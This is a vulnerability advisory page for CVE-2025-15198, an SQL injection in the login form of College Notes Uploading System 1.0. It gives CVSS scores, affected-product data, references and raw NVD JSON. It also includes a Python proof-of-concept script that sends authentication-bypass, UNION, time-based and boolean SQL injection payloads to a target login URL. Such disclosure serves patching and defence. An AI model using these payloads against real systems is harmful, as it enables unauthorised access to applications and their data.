CVE-2025-15198

Description

A weakness has been identified in code-projects College Notes Uploading System 1.0. This issue affects some unknown processing of the file /login.php. Executing a manipulation of the argument User can lead to sql injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:code-projects:college_notes_uploading_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects College Notes Uploading System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15198 PoC - SQL Injection in College Notes Uploading System 1.0
# Target: /login.php User parameter

def exploit_sqli(target_url):
    """
    SQL Injection PoC for CVE-2025-15198
    Tests for boolean-based blind SQL injection in User parameter
    """
    # Normal request to establish baseline
    normal_data = {
        'User': 'admin',
        'Password': 'test',
        'login': ''
    }
    
    # SQL Injection payloads
    payloads = [
        "admin' OR '1'='1",  # Basic authentication bypass
        "admin' UNION SELECT 1,2,3--",  # UNION-based injection
        "admin' AND SLEEP(5)--",  # Time-based blind injection
        "admin' AND 1=1--",  # Boolean-based true condition
        "admin' AND 1=2--"  # Boolean-based false condition
    ]
    
    print(f'[*] Target: {target_url}')
    print(f'[*] Testing SQL Injection vulnerabilities...')
    
    for payload in payloads:
        data = {
            'User': payload,
            'Password': 'test',
            'login': ''
        }
        try:
            response = requests.post(target_url, data=data, timeout=10)
            print(f'[+] Payload tested: {payload}')
            print(f'    Status: {response.status_code}')
            if 'success' in response.text.lower() or 'dashboard' in response.text.lower():
                print(f'    [!] Potential vulnerability confirmed!')
        except requests.RequestException as e:
            print(f'[-] Error testing payload: {e}')
    
    print('[*] PoC execution completed')
    print('[*] Manual verification recommended')

if __name__ == '__main__':
    if len(sys.argv) > 1:
        exploit_sqli(sys.argv[1])
    else:
        print('Usage: python cve_2025_15198_poc.py <target_url>')
        print('Example: python cve_2025_15198_poc.py http://target.com/login.php')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15198
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15198
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15198/
[4] VulDB https://vuldb.com/cve/CVE-2025-15198
[5] https://code-projects.org/
[6] https://github.com/Limingqian123/CVE/issues/10
[7] https://vuldb.com/?ctiid.338585
[8] https://vuldb.com/?id.338585
[9] https://vuldb.com/?submit.724724

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15198", "sourceIdentifier": "[email protected]", "published": "2025-12-29T18:15:42.333", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in code-projects College Notes Uploading System 1.0. This issue affects some unknown processing of the file /login.php. Executing a manipulation of the argument User can lead to sql injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:code-projects:college_notes_uploading_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BBD9BF11-5A22-4EF4-BAC2-7A88C196B00D"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Limingqian123/CVE/issues/10", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338585", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338585", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.724724", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}